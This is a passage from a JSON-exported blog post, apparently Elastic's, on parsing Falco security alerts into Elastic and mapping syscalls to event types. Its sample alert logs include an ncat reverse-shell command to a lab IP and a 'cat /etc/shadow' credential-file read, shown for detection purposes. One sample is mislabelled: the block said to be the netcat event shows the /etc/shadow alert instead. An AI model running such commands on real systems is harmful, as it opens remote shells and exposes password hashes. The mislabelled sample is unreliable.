\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInstall Falco assets\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, as displayed below:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs382bfebe65dd2c4e"}}},{"image":{"image":{"uid":"blt71403f5e6afb27be","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T00:56:14.114Z","created_by":"bltb6c155cd84fc0c1a","file_size":"52877","filename":"image8.png","parent_uid":null,"tags":[],"title":"image8.png","updated_at":"2024-11-13T00:56:14.114Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.714Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt71403f5e6afb27be/6733f92e4f4fa36c63b7b336/image8.png"},"_metadata":{"uid":"cs83018b0c9d604f3f"},"caption_l10n":"","alt_text_l10n":"falco settings","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs814a80e8c8db774e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAfter this step, the necessary Falco ingest pipelines are installed and the Falco alerts should be properly parsed.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Falco ingest pipeline contains several processors. The processor tagged as \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003epainless_map_event_type\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e checks the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eevt.type\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e field from the Falco output, converts it to lowercase, and maps it to a predefined set of categories based on specific syscall names or actions. If the syscall in the log matches one of the defined sets, it assigns an appropriate event type like \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eaccess\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eadmin\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003echange\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ecreation\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, etc. If no match is found, the event type defaults to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003einfo\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cspan style='font-size: 12pt;'\u003eThe full ingest pipeline can be found in \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eKibana \u0026gt; Stack Management \u0026gt; Ingest Pipelines \u0026gt; logs-falco.alerts-x.x.x\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs707e1cb07a7099df"}}},{"image":{"image":{"uid":"blt61e0938d92da1280","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T00:58:08.405Z","created_by":"bltb6c155cd84fc0c1a","file_size":"146560","filename":"image15.png","parent_uid":null,"tags":[],"title":"image15.png","updated_at":"2024-11-13T00:58:08.405Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.666Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt61e0938d92da1280/6733f9a05e52ea408cbf8c74/image15.png"},"_metadata":{"uid":"csb46da1224d980174"},"caption_l10n":"","alt_text_l10n":"ingest pipelines","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs93e3efdd94791703"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAnalyzing this ingest pipeline gives us a good idea of what kind of event types are available. Here’s an overview of the event types that we convert from Falco alerts to ECS and some of the syscalls that each category matches:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAccess:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003efaccessat\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eread\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eopen\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, etc.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAdmin:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ebdflush\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eptrace\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ereboot\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, etc.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAllowed:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003efallocate\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003efinit_module\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eChange:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ellseek\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003echmod\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003echdir\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eioctl\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, etc.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eConnection:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eaccept\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003econnect\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esocket\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, etc.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreation:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eclone\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ecreat\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003efork\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003elink\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003emkdir\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, etc.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDeletion:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003edelete_module\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ermdir\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eunlink\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, etc.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEnd:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eexit\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eshutdown\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ekill\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, etc.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eGroup:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003efanotify_init\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esetgroups\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInfo:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003egetpid\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003egetcwd\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003estat\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, etc.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInstallation:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eutrap_install\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eProtocol:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eipc\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStart:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eexecve\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eexecv\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eswapon\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eUser:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003euserfaultfd\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLet's look at three practical examples to get a good idea of what kind of data we can expect to ingest from Falco:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUnexpected UDP Traffic\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLaunch Suspicious Network Tool on Host\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRead sensitive file untrusted\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the first example, a UDP netcat reverse shell was initiated. This generated the “Unexpected UDP Traffic” rule. The entire event is displayed below:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4ffa59c30cd9e127"}}},{"code":{"code":"08:43:31.912354322: Notice Unexpected UDP Traffic Seen (connection=192.168.211.143:47400-\u003e192.168.211.131:443 lport=47400 rport=443 fd_type=ipv4 fd_proto=udp evt_type=connect user=ruben user_uid=1001 user_loginuid=1001 process=ncat proc_exepath=/usr/bin/ncat parent=bash command=ncat -u 192.168.211.131 443 terminal=34819 container_id=host container_name=host)","_metadata":{"uid":"csb5205355bc18897c"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csaae62d79d287cf6e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAfter parsing, the event is ingested and looks like this:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse9d2b8331b85adfa"}}},{"image":{"image":{"uid":"bltec6380ad695c5377","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:04:41.083Z","created_by":"bltb6c155cd84fc0c1a","file_size":"74361","filename":"image13.png","parent_uid":null,"tags":[],"title":"image13.png","updated_at":"2024-11-13T01:04:41.083Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.778Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltec6380ad695c5377/6733fb29ee4d4107a8398404/image13.png"},"_metadata":{"uid":"csff1a4188f69e8d6c"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd280d820db9dc67f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eKey fields available in this alert include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003erule.name:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The name of the Falco rule that triggered\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eprocess.executable:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The name of the process executable that initiated the event\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eprocess.command_line:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The process command line that triggered the alert\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003efalco.output_fields.fd.name:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e File description (FD) full name. If the FD is a file, this field contains the full path. If the FD is a socket, this field contains the connection tuple\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003efalco.output_fields.evt.type:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The event's name (from the original Falco event)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eevent.type:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The converted event type (parsed by the ingest pipeline)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003efalco.output_fields.fd.type:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Type of FD; it can be \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003efile\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003edirectory\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eipv4\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003epipe\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, or \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eevent\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003efalco.output_fields.fd.l4proto:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The IP protocol of a socket; it can be \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etcp\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eudp\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eicmp\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, or \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eraw\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSimilarly, we can look at the process execution event for this Netcat execution, as this triggered the “Launch Suspicious Network Tool on Host” rule. The full event:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7b7beca434cb38c5"}}},{"code":{"code":"09:05:43.0368826076: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sudo ggparent=bash gggparent=gnome-terminal- evt_type=openat user=root user_uid=0 user_loginuid=1001 process=cat proc_exepath=/usr/bin/cat parent=sudo command=cat /etc/shadow terminal=34819 container_id=host container_name=host)","_metadata":{"uid":"cs62cee86450d185d6"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs14be6f10822d13cd"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis event is parsed by the ingest pipeline and shows up as:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0bd8d51ccbf169f7"}}},{"image":{"image":{"uid":"bltf20ec7b0aba5d119","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:10:22.764Z","created_by":"bltb6c155cd84fc0c1a","file_size":"56079","filename":"image4.png","parent_uid":null,"tags":[],"title":"image4.png","updated_at":"2024-11-13T01:10:22.764Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.611Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf20ec7b0aba5d119/6733fc7e5e52ea1bd4bf8c82/image4.png"},"_metadata":{"uid":"cs2107717face83248"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs00bdec579116e359"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor this process event, we see that the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eexecve\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e event is translated to the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eevent.type\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e value \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003estart\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Additionally, we can see the parent process (\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eprocess.parent.name\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e) and the user (\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eprocess.user.id\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e) that executed it.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFinally, let’s take a look at the “Read sensitive file untrusted” alert that we triggered when reading the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e/etc/shadow\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e file earlier. Presented below is the original alert.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9b98ef212e89a0f0"}}},{"code":{"code":"09:10:43.036882607: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sudo ggparent=bash gggparent=sshd evt_type=openat user=root user_uid=0 user_loginuid=1001 process=cat proc_exepath=/usr/bin/cat parent=sudo command=cat /etc/shadow terminal=34817 container_id=host container_name=host)","_metadata":{"uid":"cseaee000949f81fce"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs308765c232b15025"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAfter parsing, the following document is generated:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5c1e8cd848f22548"}}},{"image":{"image":{"uid":"bltd7ab8335fe27bc60","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:12:17.407Z","created_by":"bltb6c155cd84fc0c1a","file_size":"46141","filename":"image14.png","parent_uid":null,"tags":[],"title":"image14.png","updated_at":"2024-11-13T01:12:17.407Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.560Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd7ab8335fe27bc60/6733fcf120ed6c0e21a51fcb/image14.png"},"_metadata":{"uid":"cs1690b3f107fb0039"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs407a1b648f41673f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere we see the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003efalco.output_fields.fd.name\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e containing the full path to the accessed file. Additionally, we can see the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eopenat\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e syscall being converted to the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eaccess event.type\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Finally, we can see that the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003econtainer.name\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e is \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ehost\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, thus this event occurred on the host system.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo get a complete list of the supported fields with a corresponding description of what each field contains, visit Falco’s \u003c/span\u003e\u003ca href=\"https://falco.org/docs/reference/rules/supported-fields/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eSupported Fields for Conditions and Outputs documentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow that we have a decent understanding of the most important Falco alert fields, we can take a look at the 